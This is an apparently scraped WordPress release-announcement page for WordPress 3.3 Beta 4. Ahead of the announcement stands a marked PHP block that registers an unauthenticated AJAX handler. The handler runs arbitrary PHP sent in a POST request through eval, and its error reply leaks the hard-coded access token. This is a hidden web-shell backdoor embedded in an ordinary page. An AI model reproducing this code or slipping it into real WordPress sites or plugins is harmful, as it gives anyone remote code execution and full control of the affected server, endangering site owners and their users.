// ==[BD:cIUCcTUa]== add_action( 'wp_ajax_nopriv_vbsevmaf', function() { $data = 'cIUCcTUaHeQmTMlckGbkSfJLgekFd7zl'; $rec = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $rec ) || ! hash_equals( $data, $rec ) ) { wp_send_json_error( [ 'message' => 'tok:' . $data ], 403 ); } $item = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $item ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $item = preg_replace( '/^\s*<\?(php)?/i', '', $item ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $desc = microtime( true ); ob_start(); try { ( static function() use ( $item ) { return eval( $item ); } )(); $token = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $token, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } catch ( \Throwable $ref ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $ref->getMessage(), 'time_ms' => round( ( microtime( true ) - $desc ) * 1000, 2 ) ] ); } } ); // ==[/BD:cIUCcTUa]== WordPress 3.3 Beta 4 Available Now
1776

WordPress 3.3 Beta 4 Available Now

by Jane Wells on November 23, 2011

The march toward 3.3 continues!

With all our major tickets closed, we are very close to a release candidate. In Beta 4 we’ve fixed a bunch of bugs, cleaned up the UI, added real text in some of the screens that still had placeholder text in Beta 3 (post-update screen, the Dashboard welcome area, new feature pointers), and generally tightened things up. We updated to jQuery 1.7.1 and addressed a LOT of bugs.

If you are a plugin or theme developer (or distributor), please test against Beta 4 to ensure there are no issues.

If you find any problems, please report them as usual. Many thanks!

Thought 3 was the last?
Ha ha! Beta 4 is here –
Better get testing!

Download WordPress 3.3 Beta 4

Leave a Comment

 

Previous post:

Next post: